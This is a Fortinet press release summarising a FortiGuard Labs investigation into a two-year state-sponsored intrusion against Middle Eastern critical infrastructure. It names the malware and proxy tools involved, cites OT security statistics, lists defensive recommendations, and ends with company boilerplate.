Dubai: The FortiGuard Labs’ Incident Response (FGIR) team recently investigated a long-term cyber intrusion targeting critical national infrastructure (CNI) in the Middle East.
The intrusion, attributed to a state-sponsored threat actor, involved sustained espionage operations and suspected network prepositioning. Over the course of nearly two years, the threat actor deployed novel malware, bypassed network segmentation, and made repeated attempts to maintain access across segmented IT and OT environments.
Advanced Malware and Persistent Access
The multi-phase intrusion detailed by FGIR spanned from 2023 to early 2025. The attacker initially gained entry using compromised VPN credentials, then established footholds using multiple custom backdoors including HanifNet, HXLibrary, and NeoExpressRAT. They bypassed segmentation using proxy tools such as Ngrok, ReverseSocks5, and plink, and targeted virtualization infrastructure to deepen access.
While no confirmed disruption to OT systems was observed, the report notes significant reconnaissance activity in restricted environments — emphasizing the need for heightened defense across converged IT/OT networks.
The operation unfolded across four stages: initial compromise, consolidation of access, adversary response to containment, and attempted re-entry via exploitation of third-party software and phishing attacks. Even after being removed from the network, the threat actor made repeated efforts to re-establish access — signalling a long-term strategic objective.
OT Security Faces Escalating Threats
According to Fortinet’s 2024 State of Operational Technology and Cybersecurity Report, 73% of OT organizations globally have now experienced cyber intrusions — up from 49% in 2023 — with targeted OT-only attacks also rising from 17% to 24%.
This trend mirrors the patterns observed in the latest investigation, where state-linked actors deployed advanced malware, evaded detection, and used phishing and software exploitation to reestablish access after remediation efforts. For this reason, we are seeing responsibility for OT cybersecurity increasingly shifting to the CISO, CIO, and COO, with 60% of organizations reporting executive-level oversight.
Regional Threat Activity on the Rise
Fortinet’s 2025 Global Threat Landscape Report also confirms that state-sponsored groups remain highly active, targeting government, technology, and education sectors. Interestingly, over 60% of hacktivist campaigns globally were linked to geopolitical causes. The Middle East also remains a high-risk region for cyber activity, with the EMEA region accounting for 26% of recorded global exploitation attempts.
Defensive Recommendations
To defend against such persistent and well-resourced adversaries, the FortiGuard team recommends that organizations prioritize the following defensive measures:
Enforcing multi-factor authentication (MFA) and regular credential rotation
Deploying zero-trust architecture and network segmentation
Implementing endpoint detection and response (EDR) and behavioural analytics
Conducting regular penetration testing and incident response readiness exercises
This investigation highlights the persistent and evolving nature of state-backed cyber threats targeting Middle Eastern CNIs, and a growing need for continuous monitoring, adaptive defense strategies, and coordinated threat intelligence to protect critical infrastructure in the face of sophisticated cyber threats.
About Fortinet
Fortinet (Nasdaq: FTNT) is a driving force in the evolution of cybersecurity and the convergence of networking and security.
Our mission is to secure people, devices, and data everywhere, and today we deliver cybersecurity everywhere our customers need it with the largest integrated portfolio of over 50 enterprise-grade products. Well over half a million customers trust Fortinet's solutions, which are among the most deployed, most patented, and most validated in the industry.
The Fortinet Training Institute, one of the largest and broadest training programs in the industry, is dedicated to making cybersecurity training and new career opportunities available to everyone. Collaboration with esteemed organizations from both the public and private sectors, including Computer Emergency Response Teams (“CERTS”), government entities, and academia, is a fundamental aspect of Fortinet’s commitment to enhance cyber resilience globally.
FortiGuard Labs, Fortinet’s elite threat intelligence and research organization, develops and utilizes leading-edge machine learning and AI technologies to provide customers with timely and consistently top-rated protection and actionable threat intelligence.
Learn more at https://www.fortinet.com
